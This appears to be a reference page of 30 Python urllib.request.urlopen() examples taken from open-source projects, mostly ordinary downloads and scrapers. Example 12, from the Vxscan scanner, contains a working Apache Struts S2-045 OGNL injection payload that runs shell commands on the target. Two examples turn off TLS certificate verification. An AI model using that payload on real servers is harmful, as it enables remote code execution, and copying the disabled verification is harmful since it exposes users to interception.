Python urllib.request.urlopen() Examples
The following are 30 code examples showing how to use urllib.request.urlopen(). These examples are extracted from open source projects; the project, author, source file, and license are noted above each example.
You may also want to check out all available functions and classes of the module urllib.request.
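Before the project examples, here is a minimal, self-contained sketch of the typical urlopen() call pattern. It is only an illustration: the URL is a placeholder, and the timeout, headers, and error handling shown are common conventions rather than the approach of any particular project below.

from urllib.request import Request, urlopen
from urllib.error import HTTPError, URLError

# Placeholder URL; substitute any HTTP/HTTPS endpoint.
url = "https://www.example.com/"
req = Request(url, headers={"User-Agent": "Mozilla/5.0"})

try:
    # urlopen() returns a file-like response object; using it as a
    # context manager (Python 3) closes the connection automatically.
    with urlopen(req, timeout=10) as response:
        body = response.read().decode("utf-8")
        print(response.getcode(), len(body))
except HTTPError as err:
    # Raised for 4xx/5xx status codes.
    print("Server returned an error:", err.code)
except URLError as err:
    # Raised for DNS failures, refused connections, timeouts, etc.
    print("Failed to reach the server:", err.reason)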
Example 1
Project: gog-galaxy-plugin-downloader Author: Slashbunny File: download.py License: GNU General Public License v3.0 | 7 votes |
def get_plugin_config(config_uri):
    """
    Downloads/opens configuration yaml file, returns dict of Galaxy plugins
    """
    # Try to open the URI as a URL or fall back to opening local file
    try:
        config_uri_parsed = urlparse(config_uri)
        if config_uri_parsed.scheme in ['https', 'http']:
            url = urlopen(config_uri)
            yaml_data = url.read()
        else:
            with open(config_uri, 'r') as file_data:
                yaml_data = file_data.read()
    except URLError as e:
        print(e)

    # Parse the YAML configuration
    try:
        plugin_data = yaml.safe_load(yaml_data)
        return plugin_data['plugins']
    except yaml.YAMLError as e:
        print(e)
Example 2
Project: L.E.S.M.A Author: NatanaelAntonioli File: L.E.S.M.A. - Fabrica de Noobs Speedtest.py License: Apache License 2.0 | 7 votes |
def run(self):
    request = self.request
    try:
        if ((timeit.default_timer() - self.starttime) <= self.timeout and
                not SHUTDOWN_EVENT.isSet()):
            try:
                f = urlopen(request)
            except TypeError:
                # PY24 expects a string or buffer
                # This also causes issues with Ctrl-C, but we will concede
                # for the moment that Ctrl-C on PY24 isn't immediate
                request = build_request(self.request.get_full_url(),
                                        data=request.data.read(self.size))
                f = urlopen(request)
            f.read(11)
            f.close()
            self.result = sum(self.request.data.total)
        else:
            self.result = 0
    except (IOError, SpeedtestUploadTimeout):
        self.result = sum(self.request.data.total)
Example 3
Project: neural-fingerprinting Author: StephanZheng File: download_images.py License: BSD 3-Clause "New" or "Revised" License | 7 votes |
def download_image(image_id, url, x1, y1, x2, y2, output_dir):
    """Downloads one image, crops it, resizes it and saves it locally."""
    output_filename = os.path.join(output_dir, image_id + '.png')
    if os.path.exists(output_filename):
        # Don't download image if it's already there
        return True
    try:
        # Download image
        url_file = urlopen(url)
        if url_file.getcode() != 200:
            return False
        image_buffer = url_file.read()
        # Crop, resize and save image
        image = Image.open(BytesIO(image_buffer)).convert('RGB')
        w = image.size[0]
        h = image.size[1]
        image = image.crop((int(x1 * w), int(y1 * h),
                            int(x2 * w), int(y2 * h)))
        image = image.resize((299, 299), resample=Image.ANTIALIAS)
        image.save(output_filename)
    except IOError:
        return False
    return True
Example 4
Project: dynamic-training-with-apache-mxnet-on-aws Author: awslabs File: diagnose.py License: Apache License 2.0 | 7 votes |
def test_connection(name, url, timeout=10):
    """Simple connection test"""
    urlinfo = urlparse(url)
    start = time.time()
    try:
        ip = socket.gethostbyname(urlinfo.netloc)
    except Exception as e:
        print('Error resolving DNS for {}: {}, {}'.format(name, url, e))
        return
    dns_elapsed = time.time() - start

    start = time.time()
    try:
        _ = urlopen(url, timeout=timeout)
    except Exception as e:
        print("Error open {}: {}, {}, DNS finished in {} sec.".format(
            name, url, e, dns_elapsed))
        return
    load_elapsed = time.time() - start
    print("Timing for {}: {}, DNS: {:.4f} sec, LOAD: {:.4f} sec.".format(
        name, url, dns_elapsed, load_elapsed))
Example 5
Project: QCElemental Author: MolSSI File: pubchem.py License: BSD 3-Clause "New" or "Revised" License | 6 votes |
def get_sdf(self):
    """Function to return the SDF (structure-data file) of the PubChem object."""
    from urllib.request import urlopen, Request
    from urllib.parse import quote
    from urllib.error import URLError

    if len(self.dataSDF) == 0:
        url = "https://pubchem.ncbi.nlm.nih.gov/rest/pug/compound/cid/{}/SDF?record_type=3d".format(
            quote(str(self.cid))
        )
        req = Request(url, headers={"Accept": "chemical/x-mdl-sdfile"})
        try:
            self.dataSDF = urlopen(req).read().decode("utf-8")
        except URLError as e:
            msg = "Unable to open\n\n%s\n\ndue to the error\n\n%s\n\n" % (url, e)
            msg += "It is possible that 3D information does not exist for this molecule in the PubChem database\n"
            print(msg)
            raise ValidationError(msg)
    return self.dataSDF
Example 6
Project: Recipes Author: Lasagne File: cifar10.py License: MIT License | 6 votes |
def download_dataset(path, source='https://www.cs.toronto.edu/~kriz/'
                                  'cifar-10-python.tar.gz'):
    """
    Downloads and extracts the dataset, if needed.
    """
    files = ['data_batch_%d' % (i + 1) for i in range(5)] + ['test_batch']
    for fn in files:
        if not os.path.exists(os.path.join(path, 'cifar-10-batches-py', fn)):
            break  # at least one file is missing
    else:
        return  # dataset is already complete

    print("Downloading and extracting %s into %s..." % (source, path))
    if sys.version_info[0] == 2:
        from urllib import urlopen
    else:
        from urllib.request import urlopen
    import tarfile
    if not os.path.exists(path):
        os.makedirs(path)
    u = urlopen(source)
    with tarfile.open(fileobj=u, mode='r|gz') as f:
        f.extractall(path=path)
    u.close()
Example 7
Project: pyhanlp Author: hankcs File: __init__.py License: Apache License 2.0 | 6 votes |
def hanlp_releases(cache=True):
    global HANLP_RELEASES
    if cache and HANLP_RELEASES:
        return HANLP_RELEASES
    # print('Request GitHub API')
    req = urllib.Request('http://nlp.hankcs.com/download.php?file=version')
    req.add_header('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36')
    if PY == 3:
        content = urllib.urlopen(req).read()
    else:
        content = urllib.urlopen(req).read()
    content = json.loads(content.decode())
    jar_version, jar_url, data_version, data_url = content
    meta = [(jar_version, jar_url, data_version, data_url)]
    HANLP_RELEASES = meta
    return meta
Example 8
Project: script.module.inputstreamhelper Author: emilsvennesson File: utils.py License: MIT License | 6 votes |
def _http_request(url, headers=None, time_out=10):
    """Perform an HTTP request and return request"""
    log(0, 'Request URL: {url}', url=url)

    try:
        if headers:
            request = Request(url, headers=headers)
        else:
            request = Request(url)
        req = urlopen(request, timeout=time_out)
        log(0, 'Response code: {code}', code=req.getcode())
        if 400 <= req.getcode() < 600:
            raise HTTPError('HTTP %s Error for url: %s' % (req.getcode(), url), response=req)
    except (HTTPError, URLError) as err:
        log(2, 'Download failed with error {}'.format(err))
        if yesno_dialog(localize(30004), '{line1}\n{line2}'.format(
                line1=localize(30063), line2=localize(30065))):  # Internet down, try again?
            return _http_request(url, headers, time_out)
        return None

    return req
Example 9
Project: IGMC Author: muhanzhang File: data_utils.py License: MIT License | 6 votes |
def download_dataset(dataset, files, data_dir):
    """ Downloads dataset if files are not present. """
    if not np.all([os.path.isfile(data_dir + f) for f in files]):
        url = "http://files.grouplens.org/datasets/movielens/" + dataset.replace('_', '-') + '.zip'
        request = urlopen(url)

        print('Downloading %s dataset' % dataset)

        if dataset in ['ml_100k', 'ml_1m']:
            target_dir = 'raw_data/' + dataset.replace('_', '-')
        elif dataset == 'ml_10m':
            target_dir = 'raw_data/' + 'ml-10M100K'
        else:
            raise ValueError('Invalid dataset option %s' % dataset)

        with ZipFile(BytesIO(request.read())) as zip_ref:
            zip_ref.extractall('raw_data/')

        os.rename(target_dir, data_dir)
        # shutil.rmtree(target_dir)
Example 10
Project: dot2moon Author: fnk0c File: connection.py License: MIT License | 6 votes |
def HTML(self, check):
    try:
        if self.UserAgent != None:
            page_html = urlopen(Request(
                self.target_url,
                headers={"User-Agent": self.UserAgent}),
                timeout=self.TimeOut).read().decode("utf-8")
        # If not, the default will be used
        else:
            page_html = urlopen(
                self.target_url,
                timeout=self.TimeOut).read().decode("utf-8")
    except HTTPError:
        page_html = "Can't get page source code"

    if self.verbose == True:
        print(" [+] Source code got from %s" % self.target_url)
        print("----START" + "-"*71)
        print(page_html)
        print("----END" + "-"*73)

    return(page_html)
Example 11
Project: dot2moon Author: fnk0c File: connection.py License: MIT License | 6 votes |
def post(self, payload, request_par):
    data = parse.urlencode(request_par).encode()

    if self.UserAgent != None:
        req = Request(
            self.target_url, data=data,
            headers={"User-Agent": self.UserAgent})
        conn = urlopen(req, timeout=self.TimeOut)
    else:
        conn = urlopen(self.target_url, data=data, timeout=self.TimeOut)

    html = conn.read().decode("utf-8")
    page_size = len(html)

    if self.verbose == True:
        print(" [+] Source code got from %s" % payload)
        print("----START" + "-"*71)
        print(html)
        print("----END" + "-"*73)

    return(self.target_url, page_size, html, payload)
Example 12
Project: Vxscan Author: al0ne File: apache_struts_all.py License: Apache License 2.0 | 6 votes |
def st045(self):
    try:
        cmd = self.linux
        header = dict()
        header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
        header["Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#iswin?(#cmd='" + cmd + "'):(#cmd='" + cmd + "')).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
        r = request.Request(self.url, headers=header)
        text = request.urlopen(r).read()
    except http.client.IncompleteRead as e:
        text = e.partial
    except Exception:
        pass
    if 'text' in locals().keys():
        self.random = str(self.random)
        if self.random.encode('utf-8') in text and len(text) < 15:
            self.result.append('Apache S2-045 Vulnerability: ' + self.url)
Example 13
Project: fetchLandsatSentinelFromGoogleCloud Author: vascobnunes File: fels.py License: MIT License | 6 votes |
def download_metadata_file(url, outputdir, program):
    """Download and unzip the catalogue files."""
    zipped_index_path = os.path.join(outputdir, 'index_' + program + '.csv.gz')
    if not os.path.isfile(zipped_index_path):
        if not os.path.exists(os.path.dirname(zipped_index_path)):
            os.makedirs(os.path.dirname(zipped_index_path))
        print("Downloading Metadata file...")
        content = urlopen(url)
        with open(zipped_index_path, 'wb') as f:
            shutil.copyfileobj(content, f)
    index_path = os.path.join(outputdir, 'index_' + program + '.csv')
    if not os.path.isfile(index_path):
        print("Unzipping Metadata file...")
        with gzip.open(zipped_index_path) as gzip_index, open(index_path, 'wb') as f:
            shutil.copyfileobj(gzip_index, f)
    return index_path
Example 14
Project: AboveTustin Author: kevinabrandon File: flightdata.py License: MIT License | 5 votes |
def refresh(self):
    try:
        # open the data url
        self.req = urlopen(self.data_url)
        # read data from the url
        self.raw_data = self.req.read()
        # load in the json
        self.json_data = json.loads(self.raw_data.decode())
        # get time from json
        self.time = datetime.fromtimestamp(self.parser.time(self.json_data))
        # load all the aircraft
        self.aircraft = self.parser.aircraft_data(self.json_data, self.time)
    except Exception:
        print("exception in FlightData.refresh():")
        traceback.print_exc()
Example 15
Project: pkmeter Author: pkkid File: utils.py License: BSD 3-Clause "New" or "Revised" License | 5 votes |
def http_request(url, data=None, timeout=30):
    log.debug("Requesting URL: %s" % url)
    data = urlencode(data).encode('utf8') if data else None
    try:
        response = urlopen(url, data=data, timeout=timeout)
        return {'success': True, 'response': response, 'url': url}
    except Exception as err:
        log.error("Error requesting URL: %s; %s" % (url, err))
        return {'success': False, 'error': err, 'url': url}
Example 16
Project: Learning-Concurrency-in-Python Author: PacktPublishing File: asCompleted.py License: MIT License | 5 votes |
def checkStatus(url):
    print("Attempting to crawl URL: {}".format(url))
    req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
    response = urlopen(req)
    return response.getcode(), url
Example 17
Project: Learning-Concurrency-in-Python Author: PacktPublishing File: timeitContext.py License: MIT License | 5 votes |
def myFunction():
    # We create this context so that we can crawl
    # https sites
    myssl = ssl.create_default_context()
    myssl.check_hostname = False
    myssl.verify_mode = ssl.CERT_NONE

    with Timer() as t:
        req = Request('https://tutorialedge.net', headers={'User-Agent': 'Mozilla/5.0'})
        response = urlopen(req, context=myssl)

    print("Elapsed Time: {} seconds".format(t.elapsed))
Example 18
Project: L.E.S.M.A Author: NatanaelAntonioli File: L.E.S.M.A. - Fabrica de Noobs Speedtest.py License: Apache License 2.0 | 5 votes |
def catch_request(request):
    """Helper function to catch common exceptions encountered when
    establishing a connection with a HTTP/HTTPS request
    """
    try:
        uh = urlopen(request)
        return uh, False
    except HTTP_ERRORS:
        e = get_exception()
        return None, e
Example 19
Project: L.E.S.M.A Author: NatanaelAntonioli File: L.E.S.M.A. - Fabrica de Noobs Speedtest.py License: Apache License 2.0 | 5 votes |
def run(self):
    try:
        if (timeit.default_timer() - self.starttime) <= self.timeout:
            f = urlopen(self.request)
            while (not SHUTDOWN_EVENT.isSet() and
                    (timeit.default_timer() - self.starttime) <= self.timeout):
                self.result.append(len(f.read(10240)))
                if self.result[-1] == 0:
                    break
            f.close()
    except IOError:
        pass
Example 20
Project: sqliv Author: the-robot File: google.py License: GNU General Public License v3.0 | 5 votes |
def get_page(url):
    """
    Request the given URL and return the response page, using the cookie jar.

    @type  url: str
    @param url: URL to retrieve.

    @rtype:  str
    @return: Web page retrieved for the given URL.

    @raise IOError: An exception is raised on error.
    @raise urllib2.URLError: An exception is raised on error.
    @raise urllib2.HTTPError: An exception is raised on error.
    """
    request = Request(url)
    request.add_header('User-Agent',
                       'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)')
    cookie_jar.add_cookie_header(request)
    response = urlopen(request)
    cookie_jar.extract_cookies(response, request)
    html = response.read()
    response.close()
    cookie_jar.save()
    return html

# Filter links found in the Google result pages HTML code.
# Returns None if the link doesn't yield a valid result.
Example 21
Project: arxiv-collector Author: djsutherland File: arxiv_collector.py License: BSD 3-Clause "New" or "Revised" License | 5 votes |
def get_latexmk(version="ctan", dest="latexmk", verbose=True):
    try:
        from urllib.request import urlopen
    except ImportError:
        from urllib2 import urlopen as _urlopen
        from contextlib import closing

        def urlopen(*args, **kwargs):
            return closing(_urlopen(*args, **kwargs))

    import shutil
    import zipfile

    if version.lower() == "ctan":
        url = "http://mirrors.ctan.org/support/latexmk.zip"
    else:
        v = version.replace(".", "")
        url = "http://personal.psu.edu/jcc8/software/latexmk-jcc/latexmk-{}.zip".format(v)

    with io.BytesIO() as bio:
        if verbose:
            print("Downloading latexmk {}...".format(version), file=sys.stderr, end="")
        with urlopen(url) as web:
            shutil.copyfileobj(web, bio, length=131072)

        with zipfile.ZipFile(bio) as z:
            for zinfo in z.infolist():
                if os.path.basename(zinfo.filename) == "latexmk.pl":
                    with z.open(zinfo) as script, io.open(dest, "wb") as out:
                        shutil.copyfileobj(script, out)
                    # executable: https://stackoverflow.com/a/30463972/344821
                    mode = os.stat(dest).st_mode
                    mode |= (mode & 0o444) >> 2  # copy R bits to X
                    os.chmod(dest, mode)
                    break
            else:
                raise ValueError("Couldn't find latexmk.pl in {}".format(url))

    if verbose:
        print("saved to `{}`.".format(dest), file=sys.stderr)
Example 22
Project: TumblrDownloader Author: DiSiqueira File: tumblrdownloader.py License: MIT License | 5 votes |
def _getimages(self):
    ''' Get all images returned by Tumblr API '''
    site = self.api_url.replace("#start#", str(self._start))
    file = urlopen(site)
    data = file.read().decode('utf8')
    file.close()

    regex = r"<photo-url max-width=\"" + str(self._resolution) + "\">(.+?)</photo-url>"
    imagelist = re.findall(regex, data)
    return imagelist
Example 23
Project: bioservices Author: cokelaer File: xmltools.py License: GNU General Public License v3.0 | 5 votes |
def __init__(self, url, encoding="utf-8"):
    self.data = urlopen(url).read()
    super(readXML, self).__init__(self.data, encoding)
Example 24
Project: SublimeKSP Author: nojanath File: ksp_plugin.py License: GNU General Public License v3.0 | 5 votes |
def read_file_function(self, filepath):
    if filepath.startswith('http://'):
        from urllib.request import urlopen
        s = urlopen(filepath, timeout=5).read().decode('utf-8')
        return re.sub('\r+\n*', '\n', s)

    if self.base_path:
        filepath = os.path.join(self.base_path, filepath)
    filepath = os.path.abspath(filepath)

    view = CompileKspThread.find_view_by_filename(filepath, self.base_path)
    if view is None:
        s = codecs.open(filepath, 'r', 'utf-8').read()
        return re.sub('\r+\n*', '\n', s)
    else:
        return view.substr(sublime.Region(0, view.size()))
Example 25
Project: recipe-box Author: rtlee9 File: get_recipes.py License: MIT License | 5 votes |
def get_all_recipes_fn(page_str, page_num):
    base_url = 'http://www.foodnetwork.com'
    search_url_str = 'recipes/a-z'
    url = '{}/{}/{}/p/{}'.format(base_url, search_url_str, page_str, page_num)
    try:
        soup = BeautifulSoup(request.urlopen(
            request.Request(url, headers=HEADERS)).read(), "html.parser")
        recipe_link_items = soup.select('div.o-Capsule__m-Body ul.m-PromoList li a')
        recipe_links = [r.attrs['href'] for r in recipe_link_items]
        print('Read {} recipe links from {}'.format(len(recipe_links), url))
        return recipe_links
    except (HTTPError, URLError):
        print('Could not parse page {}'.format(url))
        return []
Example 26
Project: recipe-box Author: rtlee9 File: get_recipes.py License: MIT License | 5 votes |
def get_all_recipes_ar(page_num):
    base_url = 'http://allrecipes.com'
    search_url_str = 'recipes/?page'
    url = '{}/{}={}'.format(base_url, search_url_str, page_num)
    try:
        soup = BeautifulSoup(request.urlopen(
            request.Request(url, headers=HEADERS)).read(), "html.parser")
        recipe_link_items = soup.select('article > a:nth-of-type(1)')
        recipe_links = list(set(
            [r['href'] for r in recipe_link_items
             if r is not None and r['href'].split('/')[1] == 'recipe']))
        return {base_url + r: get_recipe(base_url + r) for r in recipe_links}
    except (HTTPError, URLError):
        print('Could not parse page {}'.format(url))
        return []
Example 27
Project: recipe-box Author: rtlee9 File: get_recipes.py License: MIT License | 5 votes |
def get_all_recipes_epi(page_num):
    base_url = 'http://www.epicurious.com'
    search_url_str = 'search/?content=recipe&page'
    url = '{}/{}={}'.format(base_url, search_url_str, page_num)
    try:
        soup = BeautifulSoup(request.urlopen(
            request.Request(url, headers=HEADERS)).read(), "html.parser")
        recipe_link_items = soup.select('div.results-group article.recipe-content-card a.view-complete-item')
        recipe_links = [r['href'] for r in recipe_link_items]
        return {base_url + r: get_recipe(base_url + r) for r in recipe_links}
    except (HTTPError, URLError):
        print('Could not parse page {}'.format(url))
        return []
Example 28
Project: recipe-box Author: rtlee9 File: get_recipes.py License: MIT License | 5 votes |
def get_fn_letter_links():
    # get list of pages with links to recipes
    base_url = 'http://www.foodnetwork.com'
    search_url_str = 'recipes/a-z'
    url = '{}/{}/{}'.format(base_url, search_url_str, '')
    try:
        soup = BeautifulSoup(request.urlopen(
            request.Request(url, headers=HEADERS)).read(), "html.parser")
        page_link_items = soup.select('ul.o-IndexPagination__m-List li a')
        letter_links = [p['href'] for p in page_link_items]
        return letter_links
    except (HTTPError, URLError):
        print('Could not parse page {}'.format(url))
Example 29
Project: ffplayout-engine Author: ffplayout File: playlist.py License: GNU General Public License v3.0 | 5 votes |
def get_playlist(self):
    if stdin_args.playlist:
        self.json_file = stdin_args.playlist
    else:
        year, month, day = self.list_date.split('-')
        self.json_file = os.path.join(
            _playlist.path, year, month, self.list_date + '.json')

    if '://' in self.json_file:
        self.json_file = self.json_file.replace('\\', '/')

        try:
            req = request.urlopen(self.json_file,
                                  timeout=1,
                                  context=ssl._create_unverified_context())
            b_time = req.headers['last-modified']
            temp_time = time.strptime(b_time, "%a, %d %b %Y %H:%M:%S %Z")
            mod_time = time.mktime(temp_time)

            if mod_time > self.last_mod_time:
                self.clip_nodes = valid_json(req)
                self.last_mod_time = mod_time
                messenger.info('Open: ' + self.json_file)
                validate_thread(self.clip_nodes)
        except (request.URLError, socket.timeout):
            self.eof_handling('Get playlist from url failed!', False)

    elif os.path.isfile(self.json_file):
        # check last modification from playlist
        mod_time = os.path.getmtime(self.json_file)
        if mod_time > self.last_mod_time:
            with open(self.json_file, 'r', encoding='utf-8') as f:
                self.clip_nodes = valid_json(f)

            self.last_mod_time = mod_time
            messenger.info('Open: ' + self.json_file)
            validate_thread(self.clip_nodes)
    else:
        self.clip_nodes = None
Example 30
Project: dot2moon Author: fnk0c File: connection.py License: MIT License | 5 votes |
def PageSize(self, check):
    # If different User Agent is required
    if check == True:
        try:
            if self.UserAgent != None:
                page_size = len(urlopen(Request(
                    self.target_url + "a",
                    headers={"User-Agent": self.UserAgent}),
                    timeout=self.TimeOut).read())
            # If not, default will be used
            else:
                page_size = len(urlopen(
                    self.target_url + "a",
                    timeout=self.TimeOut).read())
        except HTTPError as e:
            print(e)
            page_size = "Can't get default page size"

        if self.verbose == True:
            print(" [+] Default page size: %s bytes" % page_size)
    else:
        if self.UserAgent != None:
            page_size = len(urlopen(Request(
                self.target_url,
                headers={"User-Agent": self.UserAgent}),
                timeout=self.TimeOut).read())
        # If not, default will be used
        else:
            page_size = len(urlopen(
                self.target_url,
                timeout=self.TimeOut).read())

        if self.verbose == True:
            print(self.target_url, page_size)

    return(self.target_url, page_size)